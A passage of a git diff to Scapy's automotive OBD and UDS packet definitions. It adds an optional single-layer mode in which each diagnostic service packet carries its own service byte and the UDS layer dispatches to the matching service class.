OBD_S02(Packet): name = "S2_FreezeFrameData" fields_desc = [ + ConditionalField(XByteEnumField('service', 0x02, _OBD_SERVICES), _obd_slm), PacketListField("requests", [], OBD_S02_Record) ] class OBD_S03(Packet): name = "S3_RequestDTCs" + fields_desc = [ + ConditionalField(XByteEnumField('service', 0x03, _OBD_SERVICES), _obd_slm), + ] class OBD_S03_PR(Packet): name = "S3_ResponseDTCs" fields_desc = [ + ConditionalField(XByteEnumField('service', 0x43, _OBD_SERVICES), _obd_slm), FieldLenField('count', None, count_of='dtcs', fmt='B'), PacketListField('dtcs', [], OBD_DTC, count_from=lambda pkt: pkt.count) ] @@ -93,10 +157,16 @@ def answers(self, other): class OBD_S04(Packet): name = "S4_ClearDTCs" + fields_desc = [ + ConditionalField(XByteEnumField('service', 0x04, _OBD_SERVICES), _obd_slm), + ] class OBD_S04_PR(Packet): name = "S4_ClearDTCsPositiveResponse" + fields_desc = [ + ConditionalField(XByteEnumField('service', 0x44, _OBD_SERVICES), _obd_slm), + ] def answers(self, other): return isinstance(other, OBD_S04) @@ -105,17 +175,22 @@ def answers(self, other): class OBD_S06(Packet): name = "S6_OnBoardDiagnosticMonitoring" fields_desc = [ + ConditionalField(XByteEnumField('service', 0x06, _OBD_SERVICES), _obd_slm), FieldListField("mid", [], XByteField('', 0)) ] class OBD_S07(Packet): name = "S7_RequestPendingDTCs" + fields_desc = [ + ConditionalField(XByteEnumField('service', 0x07, _OBD_SERVICES), _obd_slm), + ] class OBD_S07_PR(Packet): name = "S7_ResponsePendingDTCs" fields_desc = [ + ConditionalField(XByteEnumField('service', 0x47, _OBD_SERVICES), _obd_slm), FieldLenField('count', None, count_of='dtcs', fmt='B'), PacketListField('dtcs', [], OBD_DTC, count_from=lambda pkt: pkt.count) ] @@ -127,6 +202,7 @@ def answers(self, other): class OBD_S08(Packet): name = "S8_RequestControlOfSystem" fields_desc = [ + ConditionalField(XByteEnumField('service', 0x08, _OBD_SERVICES), _obd_slm), FieldListField("tid", [], XByteField('', 0)) ] @@ -134,17 +210,22 @@ class OBD_S08(Packet): class OBD_S09(Packet): name = "S9_VehicleInformation" fields_desc = [ + ConditionalField(XByteEnumField('service', 0x09, _OBD_SERVICES), _obd_slm), FieldListField("iid", [], XByteField('', 0)) ] class OBD_S0A(Packet): name = "S0A_RequestPermanentDTCs" + fields_desc = [ + ConditionalField(XByteEnumField('service', 0x0A, _OBD_SERVICES), _obd_slm), + ] class OBD_S0A_PR(Packet): name = "S0A_ResponsePermanentDTCs" fields_desc = [ + ConditionalField(XByteEnumField('service', 0x4A, _OBD_SERVICES), _obd_slm), FieldLenField('count', None, count_of='dtcs', fmt='B'), PacketListField('dtcs', [], OBD_DTC, count_from=lambda pkt: pkt.count) ] diff --git a/scapy/contrib/automotive/obd/tid/tids.py b/scapy/contrib/automotive/obd/tid/tids.py index 27bda0df58a..cf92b7acd01 100644 --- a/scapy/contrib/automotive/obd/tid/tids.py +++ b/scapy/contrib/automotive/obd/tid/tids.py @@ -6,10 +6,13 @@ # scapy.contrib.status = skip -from scapy.fields import FlagsField, ByteField, ScalingField, PacketListField +from scapy.fields import ( + ConditionalField, FlagsField, ByteField, ScalingField, PacketListField, + XByteEnumField +) from scapy.packet import bind_layers, Packet from scapy.contrib.automotive.obd.packet import OBD_Packet -from scapy.contrib.automotive.obd.services import OBD_S08 +from scapy.contrib.automotive.obd.services import OBD_S08, _OBD_SERVICES, _obd_slm class _OBD_TID_Voltage(OBD_Packet): @@ -132,6 +135,7 @@ class OBD_S08_PR_Record(Packet): class OBD_S08_PR(Packet): name = "Control Operation IDs" fields_desc = [ + ConditionalField(XByteEnumField('service', 0x48, _OBD_SERVICES), _obd_slm), PacketListField("data_records", [], OBD_S08_PR_Record) ] diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 978bf6a0483..aedd4f5652b 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -19,14 +19,16 @@ ShortField, ObservableDict, XShortEnumField, XByteEnumField, StrLenField, \ FieldLenField, XStrFixedLenField, XStrLenField, FlagsField, PacketListField, \ PacketField -from scapy.packet import Packet, bind_layers, NoPayload, Raw +from scapy.packet import Packet, NoPayload, Raw, bind_layers +from scapy.compat import orb from scapy.config import conf from scapy.utils import PeriodicSenderThread from scapy.contrib.isotp import ISOTP # Typing imports -from typing import ( +from typing import ( # noqa: F401 Dict, + Type, Union, ) @@ -39,11 +41,41 @@ # "a negative response 'requestCorrectlyReceived-" # "ResponsePending' as answer of a request. \n" # "The default value is False.") - conf.contribs['UDS'] = {'treat-response-pending-as-answer': False} + conf.contribs['UDS'] = {'treat-response-pending-as-answer': False, + 'single_layer_mode': False, + 'compatibility_mode': True} conf.debug_dissector = True +def _uds_slm(pkt): + # type: (Packet) -> bool + """Return True when the service ConditionalField should be present. + + Two configuration keys in ``conf.contribs['UDS']`` control the behaviour: + + ``single_layer_mode`` (bool, default ``False``): + When *True*, :class:`UDS` acts as a dispatch layer and returns the + matching service sub-packet directly (e.g. + ``UDS(b'\\x10\\x01')`` → ``UDS_DSC``). Each sub-packet gains its + own ``service`` field so that it can be built and dissected + stand-alone. + + ``compatibility_mode`` (bool, default ``True``): + Only relevant when ``single_layer_mode`` is *True*. When *True* the + ``service`` field is **suppressed** in a sub-packet whose immediate + underlayer is already a :class:`UDS` packet. This prevents a + duplicate service byte when a sub-packet is stacked on top of a UDS + base layer (``UDS()/UDS_DSC()``). Set to *False* to always emit the + ``service`` byte from the sub-packet regardless of stacking. + """ + if not conf.contribs['UDS'].get('single_layer_mode', False): + return False + if conf.contribs['UDS'].get('compatibility_mode', True): + return pkt.underlayer is None or not isinstance(pkt.underlayer, UDS) + return True + + class UDS(ISOTP): services = ObservableDict( {0x10: 'DiagnosticSessionControl', @@ -111,13 +143,13 @@ def answers(self, other): if other.__class__ != self.__class__: return False if self.service == 0x7f: - return self.payload.answers(other) + return bool(self.payload.answers(other)) if self.service == (other.service + 0x40): if isinstance(self.payload, NoPayload) or \ isinstance(other.payload, NoPayload): return len(self) <= len(other) else: - return self.payload.answers(other.payload) + return bool(self.payload.answers(other.payload)) return False def hashret(self): @@ -126,6 +158,17 @@ def hashret(self): return struct.pack('B', bytes(self)[1] & ~0x40) return struct.pack('B', self.service & ~0x40) + _service_cls = {} # type: Dict[int, Type[Packet]] + + @classmethod + def dispatch_hook(cls, _pkt=b"", *args, **kwargs): + # type: (...) -> type + """Dispatch to the correct UDS service class in single layer mode.""" + if conf.contribs['UDS'].get('single_layer_mode', False) and len(_pkt) >= 1: + service = orb(_pkt[0]) + return cls._service_cls.get(service, cls) + return cls + # ########################DSC################################### class UDS_DSC(Packet): @@ -138,16 +181,19 @@ class UDS_DSC(Packet): 0x7F: 'ISOSAEReserved'}) name = 'DiagnosticSessionControl' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x10, UDS.services), _uds_slm), ByteEnumField('diagnosticSessionType', 0, diagnosticSessionTypes) ] bind_layers(UDS, UDS_DSC, service=0x10) +UDS._service_cls[0x10] = UDS_DSC class UDS_DSCPR(Packet): name = 'DiagnosticSessionControlPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x50, UDS.services), _uds_slm), ByteEnumField('diagnosticSessionType', 0, UDS_DSC.diagnosticSessionTypes), StrField('sessionParameterRecord', b"") @@ -159,6 +205,7 @@ def answers(self, other): bind_layers(UDS, UDS_DSCPR, service=0x50) +UDS._service_cls[0x50] = UDS_DSCPR # #########################ER################################### @@ -174,16 +221,19 @@ class UDS_ER(Packet): 0x7F: 'ISOSAEReserved'} name = 'ECUReset' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x11, UDS.services), _uds_slm), ByteEnumField('resetType', 0, resetTypes) ] bind_layers(UDS, UDS_ER, service=0x11) +UDS._service_cls[0x11] = UDS_ER class UDS_ERPR(Packet): name = 'ECUResetPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x51, UDS.services), _uds_slm), ByteEnumField('resetType', 0, UDS_ER.resetTypes), ConditionalField(ByteField('powerDownTime', 0), lambda pkt: pkt.resetType == 0x04) @@ -194,12 +244,14 @@ def answers(self, other): bind_layers(UDS, UDS_ERPR, service=0x51) +UDS._service_cls[0x51] = UDS_ERPR # #########################SA################################### class UDS_SA(Packet): name = 'SecurityAccess' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x27, UDS.services), _uds_slm), ByteField('securityAccessType', 0), ConditionalField(StrField('securityAccessDataRecord', b""), lambda pkt: pkt.securityAccessType % 2 == 1), @@ -209,11 +261,13 @@ class UDS_SA(Packet): bind_layers(UDS, UDS_SA, service=0x27) +UDS._service_cls[0x27] = UDS_SA class UDS_SAPR(Packet): name = 'SecurityAccessPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x67, UDS.services), _uds_slm), ByteField('securityAccessType', 0), ConditionalField(StrField('securitySeed', b""), lambda pkt: pkt.securityAccessType % 2 == 1), @@ -225,6 +279,7 @@ def answers(self, other): bind_layers(UDS, UDS_SAPR, service=0x67) +UDS._service_cls[0x67] = UDS_SAPR # #########################CC################################### @@ -237,6 +292,7 @@ class UDS_CC(Packet): } name = 'CommunicationControl' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x28, UDS.services), _uds_slm), ByteEnumField('controlType', 0, controlTypes), BitEnumField('communicationType0', 0, 2, {0: 'ISOSAEReserved', @@ -266,11 +322,13 @@ class UDS_CC(Packet): bind_layers(UDS, UDS_CC, service=0x28) +UDS._service_cls[0x28] = UDS_CC class UDS_CCPR(Packet): name = 'CommunicationControlPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x68, UDS.services), _uds_slm), ByteEnumField('controlType', 0, UDS_CC.controlTypes) ] @@ -280,6 +338,7 @@ def answers(self, other): bind_layers(UDS, UDS_CCPR, service=0x68) +UDS._service_cls[0x68] = UDS_CCPR # #########################AUTH################################### @@ -298,13 +357,15 @@ class UDS_AUTH(Packet): } name = "Authentication" fields_desc = [ + ConditionalField(XByteEnumField('service', 0x29, UDS.services), _uds_slm), ByteEnumField('subFunction', 0, subFunctions), ConditionalField(XByteField('communicationConfiguration', 0), lambda pkt: pkt.subFunction in [0x01, 0x02, 0x5]), ConditionalField(XShortField('certificateEvaluationId', 0), lambda pkt: pkt.subFunction == 0x04), - ConditionalField(XStrFixedLenField('algorithmIndicator', 0, length=16), - lambda pkt: pkt.subFunction in [0x05, 0x06, 0x07]), + ConditionalField( + XStrFixedLenField('algorithmIndicator', b'\x00' * 16, length=16), + lambda pkt: pkt.subFunction in [0x05, 0x06, 0x07]), ConditionalField(FieldLenField('lengthOfCertificateClient', None, fmt="H", length_of='certificateClient'), lambda pkt: pkt.subFunction in [0x01, 0x02]), @@ -356,6 +417,7 @@ class UDS_AUTH(Packet): bind_layers(UDS, UDS_AUTH, service=0x29) +UDS._service_cls[0x29] = UDS_AUTH class UDS_AUTHPR(Packet): @@ -379,10 +441,12 @@ class UDS_AUTHPR(Packet): } name = 'AuthenticationPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x69, UDS.services), _uds_slm), ByteEnumField('subFunction', 0, UDS_AUTH.subFunctions), ByteEnumField('returnValue', 0, authenticationReturnParameterTypes), - ConditionalField(XStrFixedLenField('algorithmIndicator', 0, length=16), - lambda pkt: pkt.subFunction in [0x05, 0x06, 0x07]), + ConditionalField( + XStrFixedLenField('algorithmIndicator', b'\x00' * 16, length=16), + lambda pkt: pkt.subFunction in [0x05, 0x06, 0x07]), ConditionalField(FieldLenField('lengthOfChallengeServer', None, fmt="H", length_of='challengeServer'), lambda pkt: pkt.subFunction in [0x01, 0x02, 0x05]), @@ -436,22 +500,26 @@ def answers(self, other): bind_layers(UDS, UDS_AUTHPR, service=0x69) +UDS._service_cls[0x69] = UDS_AUTHPR # #########################TP################################### class UDS_TP(Packet): name = 'TesterPresent' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x3e, UDS.services), _uds_slm), ByteField('subFunction', 0) ] -bind_layers(UDS, UDS_TP, service=0x3E) +bind_layers(UDS, UDS_TP, service=0x3e) +UDS._service_cls[0x3e] = UDS_TP class UDS_TPPR(Packet): name = 'TesterPresentPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x7e, UDS.services), _uds_slm), ByteField('zeroSubFunction', 0) ] @@ -459,7 +527,8 @@ def answers(self, other): return isinstance(other, UDS_TP) -bind_layers(UDS, UDS_TPPR, service=0x7E) +bind_layers(UDS, UDS_TPPR, service=0x7e) +UDS._service_cls[0x7e] = UDS_TPPR # #########################ATP################################### @@ -473,6 +542,7 @@ class UDS_ATP(Packet): } name = 'AccessTimingParameter' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x83, UDS.services), _uds_slm), ByteEnumField('timingParameterAccessType', 0, timingParameterAccessTypes), ConditionalField(StrField('timingParameterRequestRecord', b""), @@ -481,11 +551,13 @@ class UDS_ATP(Packet): bind_layers(UDS, UDS_ATP, service=0x83) +UDS._service_cls[0x83] = UDS_ATP class UDS_ATPPR(Packet): name = 'AccessTimingParameterPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0xc3, UDS.services), _uds_slm), ByteEnumField('timingParameterAccessType', 0, UDS_ATP.timingParameterAccessTypes), ConditionalField(StrField('timingParameterResponseRecord', b""), @@ -498,7 +570,8 @@ def answers(self, other): self.timingParameterAccessType -bind_layers(UDS, UDS_ATPPR, service=0xC3) +bind_layers(UDS, UDS_ATPPR, service=0xc3) +UDS._service_cls[0xc3] = UDS_ATPPR # #########################SDT################################### @@ -507,6 +580,7 @@ def answers(self, other): class UDS_SDT(Packet): name = 'SecuredDataTransmission' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x84, UDS.services), _uds_slm), BitField('requestMessage', 0, 1), BitField('ISOSAEReservedBackwardsCompatibility', 0, 2), BitField('preEstablishedKeyUsed', 0, 1), @@ -523,11 +597,13 @@ class UDS_SDT(Packet): bind_layers(UDS, UDS_SDT, service=0x84) +UDS._service_cls[0x84] = UDS_SDT class UDS_SDTPR(Packet): name = 'SecuredDataTransmissionPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0xc4, UDS.services), _uds_slm), BitField('requestMessage', 0, 1), BitField('ISOSAEReservedBackwardsCompatibility', 0, 2), BitField('preEstablishedKeyUsed', 0, 1), @@ -546,7 +622,8 @@ def answers(self, other): return isinstance(other, UDS_SDT) -bind_layers(UDS, UDS_SDTPR, service=0xC4) +bind_layers(UDS, UDS_SDTPR, service=0xc4) +UDS._service_cls[0xc4] = UDS_SDTPR # #########################CDTCS################################### @@ -558,17 +635,20 @@ class UDS_CDTCS(Packet): } name = 'ControlDTCSetting' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x85, UDS.services), _uds_slm), ByteEnumField('DTCSettingType', 0, DTCSettingTypes), StrField('DTCSettingControlOptionRecord', b"") ] bind_layers(UDS, UDS_CDTCS, service=0x85) +UDS._service_cls[0x85] = UDS_CDTCS class UDS_CDTCSPR(Packet): name = 'ControlDTCSettingPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0xc5, UDS.services), _uds_slm), ByteEnumField('DTCSettingType', 0, UDS_CDTCS.DTCSettingTypes) ] @@ -576,7 +656,8 @@ def answers(self, other): return isinstance(other, UDS_CDTCS) -bind_layers(UDS, UDS_CDTCSPR, service=0xC5) +bind_layers(UDS, UDS_CDTCSPR, service=0xc5) +UDS._service_cls[0xc5] = UDS_CDTCSPR # #########################ROE################################### @@ -588,6 +669,7 @@ class UDS_ROE(Packet): } name = 'ResponseOnEvent' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x86, UDS.services), _uds_slm), ByteEnumField('eventType', 0, eventTypes), ByteField('eventWindowTime', 0), StrField('eventTypeRecord', b"") @@ -595,11 +677,13 @@ class UDS_ROE(Packet): bind_layers(UDS, UDS_ROE, service=0x86) +UDS._service_cls[0x86] = UDS_ROE class UDS_ROEPR(Packet): name = 'ResponseOnEventPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0xc6, UDS.services), _uds_slm), ByteEnumField('eventType', 0, UDS_ROE.eventTypes), ByteField('numberOfIdentifiedEvents', 0), ByteField('eventWindowTime', 0), @@ -611,7 +695,8 @@ def answers(self, other): and other.eventType == self.eventType -bind_layers(UDS, UDS_ROEPR, service=0xC6) +bind_layers(UDS, UDS_ROEPR, service=0xc6) +UDS._service_cls[0xc6] = UDS_ROEPR # #########################LC################################### @@ -624,6 +709,7 @@ class UDS_LC(Packet): } name = 'LinkControl' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x87, UDS.services), _uds_slm), ByteEnumField('linkControlType', 0, linkControlTypes), ConditionalField(ByteField('baudrateIdentifier', 0), lambda pkt: pkt.linkControlType == 0x1), @@ -637,11 +723,13 @@ class UDS_LC(Packet): bind_layers(UDS, UDS_LC, service=0x87) +UDS._service_cls[0x87] = UDS_LC class UDS_LCPR(Packet): name = 'LinkControlPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0xc7, UDS.services), _uds_slm), ByteEnumField('linkControlType', 0, UDS_LC.linkControlTypes) ] @@ -650,7 +738,8 @@ def answers(self, other): and other.linkControlType == self.linkControlType -bind_layers(UDS, UDS_LCPR, service=0xC7) +bind_layers(UDS, UDS_LCPR, service=0xc7) +UDS._service_cls[0xc7] = UDS_LCPR # #########################RDBI################################### @@ -658,6 +747,7 @@ class UDS_RDBI(Packet): dataIdentifiers = ObservableDict() name = 'ReadDataByIdentifier' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x22, UDS.services), _uds_slm), FieldListField("identifiers", None, XShortEnumField('dataIdentifier', 0, dataIdentifiers)) @@ -665,11 +755,13 @@ class UDS_RDBI(Packet): bind_layers(UDS, UDS_RDBI, service=0x22) +UDS._service_cls[0x22] = UDS_RDBI class UDS_RDBIPR(Packet): name = 'ReadDataByIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x62, UDS.services), _uds_slm), XShortEnumField('dataIdentifier', 0, UDS_RDBI.dataIdentifiers), ] @@ -680,12 +772,14 @@ def answers(self, other): bind_layers(UDS, UDS_RDBIPR, service=0x62) +UDS._service_cls[0x62] = UDS_RDBIPR # #########################RMBA################################### class UDS_RMBA(Packet): name = 'ReadMemoryByAddress' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x23, UDS.services), _uds_slm), BitField('memorySizeLen', 0, 4), BitField('memoryAddressLen', 0, 4), ConditionalField(XByteField('memoryAddress1', 0), @@ -708,11 +802,13 @@ class UDS_RMBA(Packet): bind_layers(UDS, UDS_RMBA, service=0x23) +UDS._service_cls[0x23] = UDS_RMBA class UDS_RMBAPR(Packet): name = 'ReadMemoryByAddressPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x63, UDS.services), _uds_slm), StrField('dataRecord', b"", fmt="B") ] @@ -721,6 +817,7 @@ def answers(self, other): bind_layers(UDS, UDS_RMBAPR, service=0x63) +UDS._service_cls[0x63] = UDS_RMBAPR # #########################RSDBI################################### @@ -728,17 +825,20 @@ class UDS_RSDBI(Packet): name = 'ReadScalingDataByIdentifier' dataIdentifiers = ObservableDict() fields_desc = [ + ConditionalField(XByteEnumField('service', 0x24, UDS.services), _uds_slm), XShortEnumField('dataIdentifier', 0, dataIdentifiers) ] bind_layers(UDS, UDS_RSDBI, service=0x24) +UDS._service_cls[0x24] = UDS_RSDBI # TODO: Implement correct scaling here, instead of using just the dataRecord class UDS_RSDBIPR(Packet): name = 'ReadScalingDataByIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x64, UDS.services), _uds_slm), XShortEnumField('dataIdentifier', 0, UDS_RSDBI.dataIdentifiers), ByteField('scalingByte', 0), StrField('dataRecord', b"", fmt="B") @@ -750,6 +850,7 @@ def answers(self, other): bind_layers(UDS, UDS_RSDBIPR, service=0x64) +UDS._service_cls[0x64] = UDS_RSDBIPR # #########################RDBPI################################### @@ -764,19 +865,22 @@ class UDS_RDBPI(Packet): } name = 'ReadDataByPeriodicIdentifier' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x2a, UDS.services), _uds_slm), ByteEnumField('transmissionMode', 0, transmissionModes), ByteEnumField('periodicDataIdentifier', 0, periodicDataIdentifiers), StrField('furtherPeriodicDataIdentifier', b"", fmt="B") ] -bind_layers(UDS, UDS_RDBPI, service=0x2A) +bind_layers(UDS, UDS_RDBPI, service=0x2a) +UDS._service_cls[0x2a] = UDS_RDBPI # TODO: Implement correct scaling here, instead of using just the dataRecord class UDS_RDBPIPR(Packet): name = 'ReadDataByPeriodicIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x6a, UDS.services), _uds_slm), ByteField('periodicDataIdentifier', 0), StrField('dataRecord', b"", fmt="B") ] @@ -786,7 +890,8 @@ def answers(self, other): and other.periodicDataIdentifier == self.periodicDataIdentifier -bind_layers(UDS, UDS_RDBPIPR, service=0x6A) +bind_layers(UDS, UDS_RDBPIPR, service=0x6a) +UDS._service_cls[0x6a] = UDS_RDBPIPR # #########################DDDI################################### @@ -798,17 +903,20 @@ class UDS_DDDI(Packet): 0x2: "defineByMemoryAddress", 0x3: "clearDynamicallyDefinedDataIdentifier"} fields_desc = [ + ConditionalField(XByteEnumField('service', 0x2c, UDS.services), _uds_slm), ByteEnumField('subFunction', 0, subFunctions), StrField('dataRecord', b"", fmt="B") ] -bind_layers(UDS, UDS_DDDI, service=0x2C) +bind_layers(UDS, UDS_DDDI, service=0x2c) +UDS._service_cls[0x2c] = UDS_DDDI class UDS_DDDIPR(Packet): name = 'DynamicallyDefineDataIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x6c, UDS.services), _uds_slm), ByteEnumField('subFunction', 0, UDS_DDDI.subFunctions), XShortField('dynamicallyDefinedDataIdentifier', 0) ] @@ -818,24 +926,28 @@ def answers(self, other): and other.subFunction == self.subFunction -bind_layers(UDS, UDS_DDDIPR, service=0x6C) +bind_layers(UDS, UDS_DDDIPR, service=0x6c) +UDS._service_cls[0x6c] = UDS_DDDIPR # #########################WDBI################################### class UDS_WDBI(Packet): name = 'WriteDataByIdentifier' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x2e, UDS.services), _uds_slm), XShortEnumField('dataIdentifier', 0, UDS_RDBI.dataIdentifiers) ] -bind_layers(UDS, UDS_WDBI, service=0x2E) +bind_layers(UDS, UDS_WDBI, service=0x2e) +UDS._service_cls[0x2e] = UDS_WDBI class UDS_WDBIPR(Packet): name = 'WriteDataByIdentifierPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x6e, UDS.services), _uds_slm), XShortEnumField('dataIdentifier', 0, UDS_RDBI.dataIdentifiers), ] @@ -845,13 +957,15 @@ def answers(self, other): and other.dataIdentifier == self.dataIdentifier -bind_layers(UDS, UDS_WDBIPR, service=0x6E) +bind_layers(UDS, UDS_WDBIPR, service=0x6e) +UDS._service_cls[0x6e] = UDS_WDBIPR # #########################WMBA################################### class UDS_WMBA(Packet): name = 'WriteMemoryByAddress' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x3d, UDS.services), _uds_slm), BitField('memorySizeLen', 0, 4), BitField('memoryAddressLen', 0, 4), ConditionalField(XByteField('memoryAddress1', 0), @@ -875,12 +989,14 @@ class UDS_WMBA(Packet): ] -bind_layers(UDS, UDS_WMBA, service=0x3D) +bind_layers(UDS, UDS_WMBA, service=0x3d) +UDS._service_cls[0x3d] = UDS_WMBA class UDS_WMBAPR(Packet): name = 'WriteMemoryByAddressPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x7d, UDS.services), _uds_slm), BitField('memorySizeLen', 0, 4), BitField('memoryAddressLen', 0, 4), ConditionalField(XByteField('memoryAddress1', 0), @@ -907,13 +1023,14 @@ def answers(self, other): and other.memoryAddressLen == self.memoryAddressLen -bind_layers(UDS, UDS_WMBAPR, service=0x7D) +bind_layers(UDS, UDS_WMBAPR, service=0x7d) +UDS._service_cls[0x7d] = UDS_WMBAPR # ##########################DTC##################################### class DTC(Packet): name = 'Diagnostic Trouble Code' - dtc_descriptions = {} # Customize this dictionary for each individual ECU / OEM + dtc_descriptions = {} # type: Dict[int, str] fields_desc = [ BitEnumField("system", 0, 2, { @@ -938,6 +1055,7 @@ def extract_padding(self, s): class UDS_CDTCI(Packet): name = 'ClearDiagnosticInformation' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x14, UDS.services), _uds_slm), ByteField('groupOfDTCHighByte', 0), ByteField('groupOfDTCMiddleByte', 0), ByteField('groupOfDTCLowByte', 0), @@ -945,9 +1063,13 @@ class UDS_CDTCI(Packet): bind_layers(UDS, UDS_CDTCI, service=0x14) +UDS._service_cls[0x14] = UDS_CDTCI class UDS_CDTCIPR(Packet): + fields_desc = [ + ConditionalField(XByteEnumField('service', 0x54, UDS.services), _uds_slm), + ] name = 'ClearDiagnosticInformationPositiveResponse' def answers(self, other): @@ -955,6 +1077,7 @@ def answers(self, other): bind_layers(UDS, UDS_CDTCIPR, service=0x54) +UDS._service_cls[0x54] = UDS_CDTCIPR # #########################RDTCI################################### @@ -1012,6 +1135,7 @@ class UDS_RDTCI(Packet): } name = 'ReadDTCInformation' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x19, UDS.services), _uds_slm), ByteEnumField('reportType', 0, reportTypes), ConditionalField(FlagsField('DTCSeverityMask', 0, 8, dtcSeverityMask), lambda pkt: pkt.reportType in [0x07, 0x08]), @@ -1029,6 +1153,7 @@ class UDS_RDTCI(Packet): bind_layers(UDS, UDS_RDTCI, service=0x19) +UDS._service_cls[0x19] = UDS_RDTCI class DTCAndStatusRecord(Packet): @@ -1062,7 +1187,7 @@ class DTCExtendedDataRecord(Packet): class DTCSnapshot(Packet): - identifiers = defaultdict(list) # for later extension + identifiers = defaultdict(list) # type: Dict[int, list] # for later extension @staticmethod def next_identifier_cb(pkt, lst, cur, remain): @@ -1091,6 +1216,7 @@ class DTCSnapshotRecord(Packet): class UDS_RDTCIPR(Packet): name = 'ReadDTCInformationPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x59, UDS.services), _uds_slm), ByteEnumField('reportType', 0, UDS_RDTCI.reportTypes), ConditionalField( FlagsField('DTCStatusAvailabilityMask', 0, 8, UDS_RDTCI.dtcStatus), @@ -1140,6 +1266,7 @@ def answers(self, other): bind_layers(UDS, UDS_RDTCIPR, service=0x59) +UDS._service_cls[0x59] = UDS_RDTCIPR # #########################RC################################### @@ -1153,17 +1280,20 @@ class UDS_RC(Packet): routineControlIdentifiers = ObservableDict() name = 'RoutineControl' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x31, UDS.services), _uds_slm), ByteEnumField('routineControlType', 0, routineControlTypes), XShortEnumField('routineIdentifier', 0, routineControlIdentifiers) ] bind_layers(UDS, UDS_RC, service=0x31) +UDS._service_cls[0x31] = UDS_RC class UDS_RCPR(Packet): name = 'RoutineControlPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x71, UDS.services), _uds_slm), ByteEnumField('routineControlType', 0, UDS_RC.routineControlTypes), XShortEnumField('routineIdentifier', 0, UDS_RC.routineControlIdentifiers), @@ -1181,6 +1311,7 @@ def answers(self, other): bind_layers(UDS, UDS_RCPR, service=0x71) +UDS._service_cls[0x71] = UDS_RCPR # #########################RD################################### @@ -1190,6 +1321,7 @@ class UDS_RD(Packet): }) name = 'RequestDownload' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x34, UDS.services), _uds_slm), ByteEnumField('dataFormatIdentifier', 0, dataFormatIdentifiers), BitField('memorySizeLen', 0, 4), BitField('memoryAddressLen', 0, 4), @@ -1213,11 +1345,13 @@ class UDS_RD(Packet): bind_layers(UDS, UDS_RD, service=0x34) +UDS._service_cls[0x34] = UDS_RD class UDS_RDPR(Packet): name = 'RequestDownloadPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x74, UDS.services), _uds_slm), BitField('memorySizeLen', 0, 4), BitField('reserved', 0, 4), StrField('maxNumberOfBlockLength', b"", fmt="B"), @@ -1228,12 +1362,14 @@ def answers(self, other): bind_layers(UDS, UDS_RDPR, service=0x74) +UDS._service_cls[0x74] = UDS_RDPR # #########################RU################################### class UDS_RU(Packet): name = 'RequestUpload' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x35, UDS.services), _uds_slm), ByteEnumField('dataFormatIdentifier', 0, UDS_RD.dataFormatIdentifiers), BitField('memorySizeLen', 0, 4), @@ -1258,11 +1394,13 @@ class UDS_RU(Packet): bind_layers(UDS, UDS_RU, service=0x35) +UDS._service_cls[0x35] = UDS_RU class UDS_RUPR(Packet): name = 'RequestUploadPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x75, UDS.services), _uds_slm), BitField('memorySizeLen', 0, 4), BitField('reserved', 0, 4), StrField('maxNumberOfBlockLength', b"", fmt="B"), @@ -1273,23 +1411,27 @@ def answers(self, other): bind_layers(UDS, UDS_RUPR, service=0x75) +UDS._service_cls[0x75] = UDS_RUPR # #########################TD################################### class UDS_TD(Packet): name = 'TransferData' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x36, UDS.services), _uds_slm), ByteField('blockSequenceCounter', 0), StrField('transferRequestParameterRecord', b"", fmt="B") ] bind_layers(UDS, UDS_TD, service=0x36) +UDS._service_cls[0x36] = UDS_TD class UDS_TDPR(Packet): name = 'TransferDataPositiveResponse' fields_desc = [ + ConditionalField(XByteEnumField('service', 0x76, UDS.services), _uds_slm), ByteField('blockSequenceCounter', 0), StrField('transferResponseParameterRecord', b"", fmt="B") 